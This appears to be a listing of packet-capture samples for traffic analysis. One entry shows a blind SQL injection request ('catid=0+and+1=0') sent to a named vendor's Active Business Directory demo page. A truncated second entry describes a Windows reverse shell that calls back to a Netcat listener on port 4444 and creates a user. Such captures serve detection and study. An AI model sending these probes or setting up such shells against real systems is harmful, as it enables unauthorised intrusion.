Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP > Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
.. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP > Flags [.], …

Converted PCAP sample of a Microsoft Windows Reverse Shell

Converted PCAP sample of a Microsoft Windows reverse shell. The shell is spawned on port 4444: the hacked PC initiates the connection to a host that has a Netcat listener waiting on port 4444 to spawn a command line shell on connect. Once the shell is spawned, you can see that a user is created and added …